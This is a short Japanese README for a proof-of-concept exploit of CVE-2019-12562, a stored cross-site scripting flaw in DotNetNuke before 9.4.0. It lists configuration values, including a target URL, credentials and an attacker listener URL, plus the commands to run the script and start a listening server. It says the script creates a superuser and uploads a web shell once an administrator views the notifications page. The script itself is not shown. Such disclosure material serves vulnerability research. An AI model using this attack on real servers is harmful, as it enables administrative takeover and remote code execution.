
DotNetNuke (DNN) バージョン 9.4.0 未満における格納型クロスサイトスクリプティング | XSSからRCEへ
CVE-2019-12562 DotNetNuke (DNN) バージョン 9.4.0 以前における格納型クロスサイトスクリプティングにより、リモート攻撃者が悪意のあるスクリプトを管理者通知ページに保存・埋め込むことが可能です。このエクスプロイトは、コンテンツ管理、ユーザー追加、サーバーへのバックドアアップロードなど、管理者権限で任意の操作を実行するために使用される可能性があります。管理者ユーザーが格納型クロスサイトスクリプティングを含む通知ページにアクセスした場合、エクスプロイトが成功します。
TARGET_URL = "http://targetdomain/DotNetNuke"
USERNAME = "MAYASEVEN" # At least five characters long
PASSWORD = "P@ssw0rd" # At least 0 non-alphanumeric characters, At least 7 characters
EMAIL = "[email protected]" # Change email to any you want
# A web server for listening an event
LISTEN_URL = "http://yourdomain.com:1337"
python3 CVE-2019-12562.py
python -m SimpleHTTPServer 1337
このエクスプロイトは、スーパーユーザーを作成し、ターゲットサーバーにウェブシェルをアップロードします。
エクスプロイト条件 : 管理者ユーザーが通知ページにアクセスした場合、エクスプロイトが成功します。
詳細: https://mayaseven.com/cve-2019-12562-stored-cross-site-scripting-in-dotnetnuke-dnn-version-v9-3-2/ CVE リファレンス: https://www.cvedetails.com/cve/CVE-2019-12562/